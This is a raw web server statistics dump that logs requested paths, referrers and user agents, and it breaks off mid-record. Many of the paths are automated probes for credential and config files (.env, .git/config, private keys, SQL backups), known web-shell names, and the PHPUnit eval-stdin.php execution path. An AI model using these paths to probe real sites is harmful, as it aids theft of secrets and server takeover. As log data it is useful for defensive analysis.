29359668 0 0 29325293 0 /go.php?p= 1 0 0 0 2 0 0 29415130 0 0 29402814 0 /wp-content/upgrade/about.php 1 0 0 0 1 0 0 29294468 0 0 29294468 0 /async.php 1 0 0 0 11 0 0 29388027 0 0 29299891 0 /file15.php 1 0 0 0 1 0 0 29357731 0 0 29357731 0 /manager/media/script/mootools/mootools.js?147.93.158.41 1 0 0 0 10 0 0 29415130 0 0 29341248 0 /classwithtostring.php 1 0 0 0 1 0 0 29416373 0 0 29416373 0 /index.php/phpinfo 1 0 0 0 1 0 0 29277539 0 0 29277539 0 /testmail.php 1 0 0 0 2 0 0 29388632 0 0 29386475 0 /wp-signup.php 1 0 0 0 2 0 0 29388632 0 0 29386475 0 /witm.php 1 0 0 0 1 0 0 29187262 0 0 29187262 0 /.ftpconfig 1 0 0 0 1 0 0 29313937 0 0 29313937 0 /bak 1 0 0 0 1 0 0 29294468 0 0 29294468 0 /volka.php 1 0 0 0 8 0 0 29372859 0 0 29326315 0 /plss3.php 1 0 0 0 3 0 0 29415130 0 0 29211743 0 /wp-includes/images/wp-login.php 1 0 0 0 1 0 0 28995765 0 0 28995765 0 /old?45.148.10.172 1 0 0 0 1 0 0 29278577 0 0 29278577 0 /y.php 1 0 0 0 1 0 0 29277539 0 0 29277539 0 /ovka.php 1 0 0 0 2 0 0 29415130 0 0 29402814 0 /autoload_classmap.php?p= 1 0 0 0 1 0 0 29187206 0 0 29187206 0 /wp-includes/ALFA_DATA/alfacgiapi/ 1 0 0 0 1 0 0 29313943 0 0 29313943 0 /bac 1 0 0 0 2 0 0 29388632 0 0 29386475 0 /xojryvch.php 1 0 0 0 1 0 0 29384959 0 0 29384959 0 /scx.php7 1 1 0 0 0 29037485 0 0 29037485 0 0 87 /.well-known/acme-challenge/bSku-IgzVt16JJuikoqsZPm-Gu6piicGlJEiXtc7phg?192.42.116.194 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /env.json 1 0 0 0 1 0 0 29388817 0 0 29388817 0 /README.md 1 0 0 0 2 0 0 29368602 0 0 29367838 0 /zoz.php 1 0 0 0 1 0 0 29278578 0 0 29278578 0 /catalog/index.php 1 0 0 0 1 0 0 29389153 0 0 29389153 0 /swagger/ 1 0 0 0 1 0 0 29278576 0 0 29278576 0 /hack.php 1 0 0 0 1 0 0 29277539 0 0 29277539 0 /124.php 1 0 0 0 1 0 0 29277539 0 0 29277539 0 /tumn.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /api/login 1 0 0 0 20 0 0 29415130 0 0 29211744 0 /about.php 1 0 0 0 2 0 0 29325243 0 0 29289142 0 /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1 0 0 0 1 0 0 29313916 0 0 29313916 0 /old-site 1 0 0 0 1 0 0 29277539 0 0 29277539 0 /asu.php 1 0 0 0 1 0 0 29250911 0 0 29250911 0 /akcc.php?copy=akcc.php&finish=1&p= 1 0 0 0 1 0 0 29278576 0 0 29278576 0 /shell.shtml 1 0 0 0 1 0 0 29299891 0 0 29299891 0 /ff2.php 1 0 0 0 1 0 0 29372859 0 0 29372859 0 /fh26.php 1 0 0 0 1 0 0 29278578 0 0 29278578 0 /wp-admin/includes/plugin-install.php 1 0 0 0 1 0 0 29291986 0 0 29291986 0 /old____tesla.php 1 0 0 0 1 0 0 29278577 0 0 29278577 0 /wp-admin/yourfile.php 1 0 0 0 1 0 0 29277539 0 0 29277539 0 /itil.php 1 0 0 0 47 0 0 29416373 0 0 28598316 0 /.git/config 1 0 0 0 4 0 0 29365498 0 0 29291986 0 /dfre.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /.env.live 1 0 0 0 2 0 0 29326315 0 0 29278577 0 /t.php 1 1 0 0 0 28861802 0 0 28861802 0 0 64 /.well-known/acme-challenge/LV3JFZA9H_4PUN_491G9_EN946DT76_- 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /config/environment.json 1 0 0 0 3 0 0 29372859 0 0 29367838 0 /hq.php 1 0 0 0 24 0 0 29393906 0 0 28867962 0 /blog/wp-includes/wlwmanifest.xml 1 0 0 0 2 0 0 29325243 0 0 29289142 0 /vendor/phpunit/Util/PHP/eval-stdin.php 1 0 0 0 1 0 0 29278578 0 0 29278578 0 /fuck.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /app/settings.php 1 1 0 0 0 29125503 0 0 29125503 0 0 64 /.well-known/acme-challenge/JVNBVZTLK3SJUH8YYJ4V7HB7LHIKAABS 1 0 0 0 1 0 0 29388817 0 0 29388817 0 /application.yml 1 0 0 0 2 0 0 29402814 0 0 29384959 0 /sko.php 1 0 0 0 1 0 0 29278577 0 0 29278577 0 /wp-includes/functions.php 1 0 0 0 2 0 0 29359668 0 0 29325294 0 /wp-admin/images/index.php 1 0 0 0 2 0 0 29415130 0 0 29402814 0 /wp-admin/network/plugins.php 1 0 0 0 2 0 0 29329147 0 0 29326315 0 /sluig.php 1 0 0 0 1 0 0 29278578 0 0 29278578 0 /bitch.php 1 0 0 0 1 0 0 29365498 0 0 29365498 0 /cc.php 1 0 0 0 2 0 0 29327096 0 0 29294468 0 /goh.php 1 0 0 0 1 0 0 29210008 0 0 29210008 0 /nf_tracking.php 1 0 0 0 2 0 0 29388632 0 0 29386475 0 /baxa1.phP8 1 0 0 0 1 0 0 29278577 0 0 29278577 0 /Fox.php 1 0 0 0 4 0 0 29416373 0 0 29032976 0 /admin/phpinfo.php 1 0 0 0 1 0 0 29145055 0 0 29145055 0 /wp/wp-includes/wlwmanifest.xml?192.42.116.194 1 0 0 0 3 0 0 29372859 0 0 29367838 0 /thxt.php 1 0 0 0 1 0 0 29278577 0 0 29278577 0 /o.php 1 0 0 0 1 0 0 29278577 0 0 29278577 0 /hidden_access.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /.docker/laravel/app/.env 1 0 0 0 2 0 0 29348745 0 0 29238407 0 /.well-known/security.txt 1 0 0 0 8 0 0 29359012 0 0 28780353 0 /app/ 1 0 0 0 2 0 0 29327096 0 0 29294468 0 /as4AaPasd.php 1 0 0 0 1 0 0 29278577 0 0 29278577 0 /shell_access.php 1 0 0 0 2 0 0 29327096 0 0 29294468 0 /miansha.php 1 0 0 0 2 0 0 29291986 0 0 29248560 0 /debug.php 1 0 0 0 1 0 0 29211743 0 0 29211743 0 /wp-admin/user/wp-login.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /app/config.php 1 0 0 0 2 0 0 29325243 0 0 29289142 0 /.env?147.93.158.41 1 1 0 0 1 29250911 0 29250912 29250911 0 29250912 7771 /akcc.php?copy=akcc.php&p= 1 0 0 0 4 0 0 29372859 0 0 29277539 0 /thoms.php 1 0 0 0 1 0 0 29278576 0 0 29278576 0 /b374k.php 1 0 0 0 1 0 0 29365498 0 0 29365498 0 /nl.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /.env.development.sample 1 0 0 0 2 0 0 29327096 0 0 29294468 0 /7wom.php 1 0 0 0 5 0 0 29388631 0 0 29354065 0 /10.php 1 0 0 0 1 0 0 28775634 0 0 28775634 0 /etc/ssl/private/server.key 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /private/.env 1 0 0 0 1 0 0 29323749 0 0 29323749 0 /wp-includes/css/buttons.css 1 0 0 0 2 0 0 29359668 0 0 29325294 0 /wp-includes/theme-compat/wp-login.php 1 0 0 0 1 0 0 28775634 0 0 28775634 0 /server.key 1 0 0 0 1 0 0 29128604 0 0 29128604 0 /dev/.git/config 1 0 0 0 1 0 0 29210038 0 0 29210038 0 /wp-admin/xl2023.php 1 5 0 0 0 28949645 0 0 28949645 0 0 435 /.well-known/acme-challenge/etDck37-88r7Md7wGaTHJSWSsSyYCeDv-5ywy6VjdgQ 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /platform/.env 1 0 0 0 1 0 0 29372859 0 0 29372859 0 /9v6.php 1 0 0 0 1 0 0 29277539 0 0 29277539 0 /wff.php 1 0 0 0 1 0 0 29294468 0 0 29294468 0 /mtrje.php 1 0 0 0 1 0 0 29410639 0 0 29410639 0 /testing 1 0 0 0 1 0 0 29384960 0 0 29384960 0 /xtt.php 1 0 0 0 13 0 0 29389153 0 0 28598316 0 /login.action 1 0 0 0 1 0 0 29384959 0 0 29384959 0 /mans.php 1 0 0 0 3 0 0 29388632 0 0 29277539 0 /unzip.php 1 0 0 0 2 0 0 29415130 0 0 29402814 0 /uploads/autoload_classmap.php 1 0 0 0 1 0 0 29384960 0 0 29384960 0 /wozxsh.php 1 0 0 0 1 0 0 29415130 0 0 29415130 0 /lsd.php 1 0 0 0 2 0 0 29341248 0 0 29278577 0 /j.php 1 0 0 0 1 0 0 29313887 0 0 29313887 0 /Test 1 0 0 0 1 0 0 29294468 0 0 29294468 0 /hg.php 1 0 0 0 1 0 0 29210010 0 0 29210010 0 /wp-admin/maint/users.php 1 0 0 0 1 0 0 29364327 0 0 29364327 0 /mah.php?109.196.75.89 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /.env.docker.dev 1 737 737 1 26 29416373 28695169 29294911 28598316 28695169 28781947 569959 / 1 0 0 0 1 0 0 29313940 0 0 29313940 0 /sitio 1 0 0 0 3 0 0 29388027 0 0 29383751 0 /lites.php 1 0 0 0 3 0 0 29372859 0 0 29367838 0 /.well-known/gecko-litespeed.php 1 0 0 0 1 0 0 28775634 0 0 28775634 0 /backup.sql 1 0 0 0 2 0 0 29415130 0 0 29402814 0 /04.php 1 1 0 0 0 29301182 0 0 29301182 0 0 64 /.well-known/acme-challenge/TX7CGAI5_JDG6PBEWT5IWHU8AL7OV5_B 1 0 0 0 3 0 0 29361379 0 0 29210038 0 /xleet.php 1 0 0 0 3 0 0 29388027 0 0 29383751 0 /classwithtostring.php?p= 1 0 0 0 1 0 0 29384960 0 0 29384960 0 /ups.php 1 0 0 0 4 0 0 29388632 0 0 29294468 0 /reyna.php 1 0 0 0 1 0 0 29313899 0 0 29313899 0 /www 1 0 0 0 5 0 0 29327096 0 0 29291986 0 /file5.php 1 0 0 0 11 0 0 29388027 0 0 29326315 0 /yellow.php 1 0 0 0 3 0 0 29327096 0 0 29294468 0 /1a.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /wp-config.php.orig 1 0 0 0 1 0 0 29341248 0 0 29341248 0 /amphicyon.php 1 0 0 0 1 0 0 29210006 0 0 29210006 0 /cong.php?192.42.116.194 1 0 0 0 5 0 0 29255841 0 0 29146878 0 /wp-login.php?192.42.116.194 1 0 0 0 2 0 0 29327095 0 0 29294468 0 /6erg.php 1 0 0 0 1 0 0 29365498 0 0 29365498 0 /af4.php 1 0 0 0 11 0 0 29388027 0 0 29294468 0 /aaa.php 1 0 0 0 3 0 0 29359668 0 0 29325293 0 /license.php 1 0 0 0 2 0 0 29361379 0 0 29361369 0 /options-reading.php 1 0 0 0 1 0 0 29387122 0 0 29387122 0 /13ede.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /.env.dev.local 1 0 0 0 15 0 0 29365182 0 0 28968133 0 /2018/wp-includes/wlwmanifest.xml 1 0 0 0 1 0 0 29313838 0 0 29313838 0 /oldsite 1 0 0 0 2 0 0 29384959 0 0 29278577 0 /e.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /prod/.env 1 5 0 0 0 29213346 0 0 29213346 0 0 435 /.well-known/acme-challenge/DtCbwxkpUp-GRR7EEZ6Ml0OyxF7P6dGgAxw76681CeQ 1 0 0 0 1 0 0 29402814 0 0 29402814 0 /yellow3.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /app/etc/env.local.php 1 0 0 0 1 0 0 29402814 0 0 29402814 0 /ww4.php 1 0 0 0 5 0 0 29372859 0 0 29325294 0 /mail.php? 1 0 0 0 2 0 0 29388631 0 0 29386475 0 /xpas2.php 1 0 0 0 6 0 0 29384959 0 0 29277539 0 /rrr.php 1 0 0 0 1 0 0 28604394 0 0 28604394 0 /node_modules/.git/config 1 0 0 0 1 0 0 29354064 0 0 29354064 0 /As.php 3 1 0 0 0 28949649 0 0 28949649 0 0 7706 https://mail.mgbacgiang3s.com/ 3 24 0 0 20 28770880 0 28815140 28598320 0 28598320 23772 https://www.ia.imators.com/ 3 0 0 0 1 0 0 29273719 0 0 29273719 0 http://www.ia.imators.com/?ND 3 1 1 0 0 28861809 0 0 28861809 0 0 1037 http://175.27.248.198/ 3 130 30 0 83 29301500 0 29399356 28598316 0 28714513 133273 http://www.ia.imators.com/ 3 0 0 0 1 0 0 29273719 0 0 29273719 0 http://www.ia.imators.com/?NA 3 0 0 0 1 0 0 28770880 0 0 28770880 0 https://www.ia.imators.com/cgi-bin/ 3 1 1 0 0 29122595 0 0 29122595 0 0 512 https://www.google.fr/ 3 29 3 0 38 29320578 0 29407122 28619043 0 28721450 31845 http://ia.imators.com/ 3 1 1 0 0 28950013 0 0 28950013 0 0 1037 http://p7g6av7v.hongch.cn/ 3 0 0 0 1 0 0 29273719 0 0 29273719 0 http://www.ia.imators.com/?MA 3 1 1 0 0 28861818 0 0 28861818 0 0 1033 http://175.24.179.113/ 3 1 0 0 0 28862556 0 0 28862556 0 0 7706 https://www.521qquu58.xyz/ 3 1 1 0 0 29352188 0 0 29352188 0 0 682 https://www.google.ca/ 3 4 0 0 0 29176024 0 0 29176024 0 0 4373 http://ia.imators.com/?ND 3 0 0 0 1 0 0 29273719 0 0 29273719 0 http://www.ia.imators.com/?SD 3 1 1 0 5 29270173 0 29270173 29270173 0 29270173 1257 https://www.i-conn.nl//wp-login.php 3 0 0 0 1 0 0 29273719 0 0 29273719 0 http://www.ia.imators.com/?SA 3 1 0 0 0 28861818 0 0 28861818 0 0 7706 http://uwcuapimanagement.configuration.azure-api.net/ 3 4 0 0 0 29176024 0 0 29176024 0 0 4373 http://ia.imators.com/?NA 3 1 0 0 0 28695169 0 0 28695169 0 0 7604 http://194.87.217.15/ 3 1 1 0 0 28862556 0 0 28862556 0 0 1037 http://156.237.46.172/ 3 1 0 0 0 28951164 0 0 28951164 0 0 7706 http://b.wjui.net/ 3 4 0 0 0 29176024 0 0 29176024 0 0 4373 http://ia.imators.com/?MD 3 1 1 0 0 28949649 0 0 28949649 0 0 1037 https://parkerjconstruction.com/ 3 4 0 0 0 29176024 0 0 29176024 0 0 4373 http://ia.imators.com/?MA 3 1 0 0 0 28949649 0 0 28949649 0 0 7706 https://27.6.173.252/ 3 0 0 0 2 0 0 29211762 0 0 29211762 0 www.google.comhttps://t.me/optimasprimetools 3 1 1 0 0 28949652 0 0 28949652 0 0 1033 http://www.kaylanicoledigitalmarketing.com/ 3 4 0 0 0 29176024 0 0 29176024 0 0 4373 http://ia.imators.com/?SD 3 12 8 0 126 29343610 0 29325243 28979553 0 29289142 10336 https://www.google.com/ 3 4 0 0 0 29176024 0 0 29176024 0 0 4373 http://ia.imators.com/?SA 3 4 0 0 7 28598526 0 28822763 28598526 0 28598526 3962 https://ia.imators.com/ 3 1 1 0 5 29274239 0 29274239 29274239 0 29274239 1257 https://ia-imaging.com//blog//wp-login.php 3 1 0 0 0 28950013 0 0 28950013 0 0 7706 https://www.gestionpl.ca/ 3 1 0 0 0 28949652 0 0 28949652 0 0 7706 https://158.193.145.151/ 3 0 0 1 2 0 29180151 29403002 0 29180151 29180151 0 http://www.ia.imators.com/cgi-bin 3 1 1 0 0 28951164 0 0 28951164 0 0 1037 http://webdisk.birkenheaddrill.com/ 3 1 1 0 0 28949649 0 0 28949649 0 0 1037 http://b.blog.davideramirez.com/ 3 1 0 0 0 28861809 0 0 28861809 0 0 7706 https://clatsopcomputersolutions.com/ 3 0 0 0 1 0 0 29320578 0 0 29320578 0 http://ia.imators.com/favicon.ico 4 0 0 0 1 0 0 28694984 0 0 28694984 0 Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36 4 1 1 0 0 29371336 0 0 29371336 0 0 1365 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 4 0 0 0 1 0 0 28780027 0 0 28780027 0 Mozilla/5.0 (Linux; Android 6.0.1; SM-G900H Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.98 Mobile Safari/537.36 4 0 0 0 1 0 0 29364456 0 0 29364456 0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 4 1 1 0 0 28607491 0 0 28607491 0 0 612 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36 4 1 0 0 0 29271246 0 0 29271246 0 0 2321 Mozilla/5.0 (Linux; U; Android 1.5; de-de; Galaxy Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 4 8 8 0 0 29405803 0 0 29034190 0 0 4456 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0 4 0 0 0 1 0 0 28604394 0 0 28604394 0 Mozilla/5.0 (Linux; U; Android 2.3.3; en-us ; LS670 Build/GRI40) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1/UCBrowser/8.6.1.262/145/355 4 0 0 0 1 0 0 29358152 0 0 29358152 0 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 4 0 0 0 1 0 0 29001245 0 0 29001245 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 4 0 0 0 1 0 0 28730748 0 0 28730748 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 4 5 1 0 0 29301185 0 0 29301185 0 0 5055 Mozilla/5.0 (iPhone; CPU iPhone OS 12_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 4 0 0 0 1 0 0 28604394 0 0 28604394 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36 4 0 0 0 1 0 0 28604394 0 0 28604394 0 Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8 4 5 5 0 55 29145055 0 29145055 28867962 0 28867962 5165 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 4 0 0 0 200 0 0 29278578 0 0 29211743 0 Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force 4 1 1 0 0 28966560 0 0 28966560 0 0 512 Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0 4 1 0 0 0 28950908 0 0 28950908 0 0 362 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 HBPC/12.0.0.300 4 0 0 0 74 0 0 29277840 0 0 29210008 0 Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 4 1 0 0 0 28780398 0 0 28780398 0 0 362 Opera/9.80 (Android; Opera Mini/43.3.2254/150.36; U; en) Presto/2.12.423 Version/12.16 4 1 1 0 0 28774464 0 0 28774464 0 0 612 Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.6) Gecko/2009020911 4 0 0 0 9 0 0 29093617 0 0 29032976 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 4 0 0 0 1 0 0 29129499 0 0 29129499 0 Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0 4 0 0 0 1 0 0 28774355 0 0 28774355 0 Mozilla/5.0 (iPhone; CPU iPhone OS 12_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/75.0.3770.103 Mobile/15E148 Safari/605.1 4 0 0 0 1 0 0 28604394 0 0 28604394 0 Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Mobile Safari/537.36 4 47 10 0 0 29301189 0 0 28598316 0 0 48402 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36 4 1 1 0 0 28598318 0 0 28598318 0 0 612 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36 4 0 0 0 1 0 0 28774509 0 0 28774509 0 Mozilla/5.0 (compatible; YandexNews/4.0; +http://yandex.com/bots) 4 1 0 0 0 28703413 0 0 28703413 0 0 2321 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36 4 1 0 0 0 28784070 0 0 28784070 0 0 2321 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7 4 4 4 0 0 28780700 0 0 28780700 0 0 2448 Mozilla/5.0 (compatible; archive.org_bot +http://archive.org/details/archive.org_bot) Zeno/cfa2980 warc/v0.8.47 4 0 0 0 1 0 0 29224424 0 0 29224424 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Safari/605.1.15 4 0 0 0 1 0 0 28781011 0 0 28781011 0 Mozilla/5.0 (Linux; Android 9; SM-G965F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36 4 1 0 0 0 29314262 0 0 29314262 0 0 2321 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36 Edg/101.0.1210.39 4 5 1 0 4 28770880 0 28770880 28770880 0 28770880 4574 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 4 1 0 0 0 28703414 0 0 28703414 0 0 2321 POLARIS/6.01 (BREW 3.1.5; U; en-us; LG; LX265; POLARIS/6.01/WAP) MMP/2.0 profile/MIDP-2.1 Configuration/CLDC-1.1 4 28 28 0 0 29391428 0 0 29179835 0 0 15936 Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com) 4 1 1 0 11 28620679 0 28620679 28620679 0 28620679 612 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 4 1 0 0 0 28703413 0 0 28703413 0 0 362 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36 OPR/62.0.3331.101 4 8 8 0 8 28774913 0 28774913 28598348 0 28598348 4896 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 (scanner.ducks.party) 4 1 0 0 0 29314260 0 0 29314260 0 0 2321 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15 4 0 0 0 1 0 0 28698032 0 0 28698032 0 Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es65 4 1 1 0 0 28686217 0 0 28686217 0 0 612 Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 4 10 2 0 0 29176024 0 0 29176024 0 0 9970 Mozilla/5.0 (Linux; Android 11; V2055A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Mobile Safari/537.36 4 43 43 0 37 28743027 0 29190744 28610126 0 28781947 54144 Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com 4 6 2 0 1 28599309 0 28599309 28599309 0 28599309 5186 Mozilla/5.0 (Macintosh; Intel Mac OS X 14.1; rv:109.0) Gecko/20100101 Firefox/120.0 4 0 0 0 1 0 0 28604394 0 0 28604394 0 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 4 0 0 0 1 0 0 29129499 0 0 29129499 0 Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 4 1 1 0 0 28784070 0 0 28784070 0 0 612 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.25 Safari/537.36 Core/1.70.3704.400 QQBrowser/10.4.3587.400 4 1 0 0 0 29314262 0 0 29314262 0 0 362 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 4 1 0 0 0 29251795 0 0 29251795 0 0 2321 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36 4 0 0 0 1 0 0 29128604 0 0 29128604 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/111.0 4 0 0 0 1 0 0 29348354 0 0 29348354 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.6 Safari/605.1.15 4 1 0 0 0 29272255 0 0 29272255 0 0 2321 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.96 Safari/537.36 4 9 9 0 10 29394334 0 29242476 29178430 0 29178430 5186 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 4 0 0 0 1 0 0 28686125 0 0 28686125 0 Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaE90-1/07.24.0.3; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413 UP.Link/6.2.3.18.0 4 48 48 0 275 29365182 0 29365182 28968133 0 28968133 60240 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 4 0 0 0 7 0 0 29358938 0 0 29354729 0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:142.0) Gecko/20100101 Firefox/142.0 4 0 0 0 1 0 0 29263273 0 0 29263273 0 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0 4 1 1 0 0 29220173 0 0 29220173 0 0 609 Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/120.0.6099.199 Safari/537.36 4 2 2 0 0 29213351 0 0 29213350 0 0 1218 WanScannerBot/1.1 4 21 21 0 0 29393601 0 0 28599365 0 0 12015 Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/) 4 1 0 0 0 28784461 0 0 28784461 0 0 362 Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36 OPR/60.0.3255.109 4 2 2 0 0 29213351 0 0 29213350 0 0 2514 WanScannerBot/1.0 4 48 0 0 0 29389153 0 0 28598314 0 0 4252 Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org) 4 8 2 0 0 29301283 0 0 28598321 0 0 7358 Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 4 0 0 0 2 0 0 28612865 0 0 28612865 0 Mozilla/5.0 (X11; Linux x86_64) 4 0 0 0 1 0 0 28699631 0 0 28699631 0 Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0 4 0 0 0 1 0 0 28604394 0 0 28604394 0 Mozilla/4.0 (compatible; MSIE 7.0; Windows Phone OS 7.0; Trident/3.1; IEMobile/7.0) Asus;Galaxy6 4 1 0 0 0 28701918 0 0 28701918 0 0 2321 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 4 0 0 0 1 0 0 29215699 0 0 29215699 0 Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50 4 1 0 0 0 28784072 0 0 28784072 0 0 2321 Mozilla/5.0 